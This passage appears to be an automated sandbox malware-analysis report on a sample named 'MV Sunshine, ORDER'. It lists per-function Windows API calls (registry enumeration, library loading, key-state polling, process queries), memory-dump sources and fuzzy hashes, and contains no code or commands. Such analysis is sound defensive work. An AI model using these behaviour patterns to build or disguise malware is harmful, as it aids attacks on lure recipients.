Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 279c88774a706d4c8981f1ec3fe43179fce499f8a50888bf6b2eda7754baebbc
Instruction ID: 7ec161bc59ceaa1110a329cd7fb74107e805bd22071d05e3ad8cc8841b49d3cc
Opcode Fuzzy Hash: 279c88774a706d4c8981f1ec3fe43179fce499f8a50888bf6b2eda7754baebbc
Instruction Fuzzy Hash: 5C115E719042198FCF00EFA4D8815EEB7B8FFA6304F108568E85567291DB325D06CB50

Function 009FEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009FEF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 009FEF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 009FF07E
CloseHandle.KERNEL32(?), ref: 009FF0FF

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: e44156c99cdfb6d325f77e9e3bcb48fa662323e79ccfc2ac7fe3b6cff25f5948
Instruction ID: f5f33b93d3689066013781377b4d3715fc3a693d3a66dfed08c9b158f094bae2
Opcode Fuzzy Hash: e44156c99cdfb6d325f77e9e3bcb48fa662323e79ccfc2ac7fe3b6cff25f5948
Instruction Fuzzy Hash: 198164716043019FD724EF28C886F3AB7E5AF88720F14881DF69ADB392DB71AC418B51

Function 00A002C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82

Part of subcall function 00A010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A00038,?,?), ref: 00A010BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A00388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A003C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A0040E
RegCloseKey.ADVAPI32(?,?), ref: 00A0043A
RegCloseKey.ADVAPI32(00000000), ref: 00A00447

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 20ebb059a84e012f672806418b86a2dd6cd23a01ac2f6ddcdf2204c0bf5e62be
Instruction ID: 5d3d6edb58ecaa8c392f8728398b914e772649d50ee2b13dd3f226283cdd0162
Opcode Fuzzy Hash: 20ebb059a84e012f672806418b86a2dd6cd23a01ac2f6ddcdf2204c0bf5e62be
Instruction Fuzzy Hash: 56512A31208208AFD714EF64D881F6EB7E8FF84704F54892DF5959B2A1DB31E905CB52

Function 009FDBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009FDC3B
GetProcAddress.KERNEL32(00000000,?), ref: 009FDCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 009FDCDA
GetProcAddress.KERNEL32(00000000,?), ref: 009FDD1B
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009FDD35

Part of subcall function 00985B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009E7B20,?,?,00000000), ref: 00985B8C
Part of subcall function 00985B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009E7B20,?,?,00000000,?,?), ref: 00985BB0

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 30aab39fcfcf8ec69af888c6ee5cc8f68d11b793da0f5dcf7f6971d0bb5104d2
Instruction ID: b2f03b1f41a5b99e418e9545f15f92cdce8c40b279c20c523792f0b8efde5a62
Opcode Fuzzy Hash: 30aab39fcfcf8ec69af888c6ee5cc8f68d11b793da0f5dcf7f6971d0bb5104d2
Instruction Fuzzy Hash: B8513A35A01209DFCB00EFA8C484AADB7F5FF59310B158069E959AB361DB31ED45CF91

Function 009EE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009EE88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009EE8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 009EE8F2

Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 009EE917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009EE91F

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: a97601689afbad973bc8aff8c599139e8106cc731cad84a4ed7d6aedc15fefaf
Instruction ID: d413cce0dd60d778236f7f21aea4b3995ca28848d570c65a7c0bb9e0736e94df
Opcode Fuzzy Hash: a97601689afbad973bc8aff8c599139e8106cc731cad84a4ed7d6aedc15fefaf
Instruction Fuzzy Hash: 1D511E35A00219DFCF15EF65C981AAEBBF5FF49310B188099E849AB362CB31ED11DB50

Function 00A0A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddedacb27a248bfb1f79782e00fe359cd51d3c974f00e12777614ab1866e107e
Instruction ID: 6346cfe96b20feb4d0b763fb6fb76e9fff09b983f18e0ee4d0d83c913590f353
Opcode Fuzzy Hash: ddedacb27a248bfb1f79782e00fe359cd51d3c974f00e12777614ab1866e107e
Instruction Fuzzy Hash: 8B41D53D90030CAFD720DF68EC48FA9BBA4FB19310F154165F856AB2E1D771AD42DA52

Function 00982344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00982357
ScreenToClient.USER32(00A467B0,?), ref: 00982374
GetAsyncKeyState.USER32(00000001), ref: 00982399
GetAsyncKeyState.USER32(00000002), ref: 009823A7

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: b19840a7b9ba9e1b5fe566ad2bec9297c0d996509abe71001ab37c7e8b21cea6
Instruction ID: 6799361d81711dec8a803713318959f44b99bfcfd203e157609b4ecb7fa3a462
Opcode Fuzzy Hash: b19840a7b9ba9e1b5fe566ad2bec9297c0d996509abe71001ab37c7e8b21cea6
Instruction Fuzzy Hash: AC419175504119FFDF199FA8C944AEDBB78FF05724F20431AF828A6290C734A950DB91

Function 009D6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009D695D
TranslateAcceleratorW.USER32(?,?,?), ref: 009D69A9
TranslateMessage.USER32(?), ref: 009D69D2
DispatchMessageW.USER32(?), ref: 009D69DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009D69EB

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 69ef47e5ebc913dfeb6edea0a9701b4001c85f241b4c748942734ffd41428407
Instruction ID: f7af7a484c294ed37a499c62735a74e92e585601b6a6a2c25eda7c224cf2bc09
Opcode Fuzzy Hash: 69ef47e5ebc913dfeb6edea0a9701b4001c85f241b4c748942734ffd41428407
Instruction Fuzzy Hash: 5D310335980246AECB20CFB4CC84BF67BACAB43300F14852BE061D32A1D776988BC791

Function 009D8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 009D8F12
PostMessageW.USER32(?,00000201,00000001), ref: 009D8FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 009D8FC4
PostMessageW.USER32(?,00000202,00000000), ref: 009D8FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 009D8FDA

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: abc0af0fbc1b7b958abff969241a842b1b2ba042626b0031e2c66d18faadeff2
Instruction ID: 1aa7742931c91a748457def7127067e2ba57ed361bbfb9de4c0210af38fa9e27
Opcode Fuzzy Hash: abc0af0fbc1b7b958abff969241a842b1b2ba042626b0031e2c66d18faadeff2
Instruction Fuzzy Hash: FF31DC71500219EFDB10CFACD948AAE7BBAEB04315F10822AF924EA2D1C7B09911CB90

Function 009DB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 009DB6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 009DB6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 009DB71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 009DB742
_wcsstr.LIBCMT ref: 009DB74C

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 5ce347dbe8ab1f3fa6239c2ee9ceba204a8f1758efb9e0eacc5f97904adc459e
Instruction ID: 861d0d770c21c7df5e5f2114b11a175f67f287f14b0073fb81a6f087f955e5d9
Opcode Fuzzy Hash: 5ce347dbe8ab1f3fa6239c2ee9ceba204a8f1758efb9e0eacc5f97904adc459e
Instruction Fuzzy Hash: FD212C32244244FFEB259B799C49E7B7B9CDF85760F11803AFC05DA261EF61CC4192A0

Function 00A0B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

GetWindowLongW.USER32(?,000000F0), ref: 00A0B44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00A0B471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A0B489
GetSystemMetrics.USER32(00000004), ref: 00A0B4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,009F1184,00000000), ref: 00A0B4D0

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 721ec18361fb1cefdf6e40878a017190afeec06d65a14382e1ebe80feb813635
Instruction ID: 70854034e526b792e8a21e4b030e5312ad791b5eb3a4c0739b1ad1fa3b8cbb9c
Opcode Fuzzy Hash: 721ec18361fb1cefdf6e40878a017190afeec06d65a14382e1ebe80feb813635
Instruction Fuzzy Hash: 8221A671920259AFCB20DF78ED44A6937A4FB05720F114734F926D31E1E7329911DBA0

Function 009D97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009D9802

Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009D9834
__itow.LIBCMT ref: 009D984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009D9874
__itow.LIBCMT ref: 009D9885

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 333d94bb8fc343c44d6316da488379f46c52f51879864f0effd943b2b2acc23a
Instruction ID: 730247c2eeed906ae6e5eb564dee0a507ba06f979e2cc671971be9f23d2f4fb7
Opcode Fuzzy Hash: 333d94bb8fc343c44d6316da488379f46c52f51879864f0effd943b2b2acc23a
Instruction Fuzzy Hash: 6421FB31B40208BFDB10BAA18C86FAE7BACEF4AB14F048025F905E7391D670CD4297D1

Function 009812F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0098134D
SelectObject.GDI32(?,00000000), ref: 0098135C
BeginPath.GDI32(?), ref: 00981373
SelectObject.GDI32(?,00000000), ref: 0098139C

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: b50176ced340503cc75f99bdd59012cd22a3bc8eef28b562060fbc6a8e3bdc15
Instruction ID: 9ab0f2c70d65bb7149ed0097f72ef6b71948a953adf489f239ad5f36dcda0586
Opcode Fuzzy Hash: b50176ced340503cc75f99bdd59012cd22a3bc8eef28b562060fbc6a8e3bdc15
Instruction Fuzzy Hash: 16212478800308DFDB11DFA5DD047A97BBDFB52322F144227F414A66A0D7729993DB91

Function 009DC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 009DC176
_memcmp.LIBCMT ref: 009DC194
_memcmp.LIBCMT ref: 009DC1A7
_memcmp.LIBCMT ref: 009DC1BF
_memcmp.LIBCMT ref: 009DC1D7

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: d6c4d0b734de0e16fcfb5893d4e89fa1b9b1c90f57ee80b0fefac9491a3f10ae
Instruction ID: d08fddcc17b9db179457f3845db2547b809fc593608a13bb629123a917f5d07d
Opcode Fuzzy Hash: d6c4d0b734de0e16fcfb5893d4e89fa1b9b1c90f57ee80b0fefac9491a3f10ae
Instruction Fuzzy Hash: CD01B5F168C2277BE204A6219C42FEB735CAF62394F048522FD04E6383E661DE21C3E0

Function 009E4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 009E4D5C
__beginthreadex.LIBCMT ref: 009E4D7A
MessageBoxW.USER32(?,?,?,?), ref: 009E4D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009E4DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009E4DAC

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 57458c69422280ab991244f1bf506de329393965fa78e190e15fc93a50a860f1
Instruction ID: 0bd71f071f8d3cd0fc1760a6909ec774b8e763d7dba5f1d1ff2e3ea199ae3847
Opcode Fuzzy Hash: 57458c69422280ab991244f1bf506de329393965fa78e190e15fc93a50a860f1
Instruction Fuzzy Hash: 7311087AD04248BFC711DFE99C08ADA7FACEB86321F144365F914D3290D6B58D4687A1

Function 009D874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009D8766
GetLastError.KERNEL32(?,009D822A,?,?,?), ref: 009D8770
GetProcessHeap.KERNEL32(00000008,?,?,009D822A,?,?,?), ref: 009D877F
HeapAlloc.KERNEL32(00000000,?,009D822A,?,?,?), ref: 009D8786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009D879D

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 387c407d43aac1afe2ea9a6921995d018f8a9cbe2cacd0f70f85ff012f65ef8c
Instruction ID: b825df4944a72399af57a4fd731a4fed033dc1a24dcf5906c7b14739da1ae384
Opcode Fuzzy Hash: 387c407d43aac1afe2ea9a6921995d018f8a9cbe2cacd0f70f85ff012f65ef8c
Instruction Fuzzy Hash: 8C016271640208FFDB208FA5DC88D677B6CFF89355B204539F949E2260DA319C02CA60

Function 009E54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E5502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 009E5510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E5518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 009E5522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E555E

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 89dcf91125e55d5d9ec399d6a0c91d1599f2b7e9e5ee6393955d868f809223bc
Instruction ID: e2d9dfe5d39f8fd109df9767f116de2bdc2649736594aeade2fbded214f2f945
Opcode Fuzzy Hash: 89dcf91125e55d5d9ec399d6a0c91d1599f2b7e9e5ee6393955d868f809223bc
Instruction Fuzzy Hash: E3015B71D00A1DDBCF10DFE9E8886EDBB79BB09715F410556E901B2540DF309951CBA1

Function 009D7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

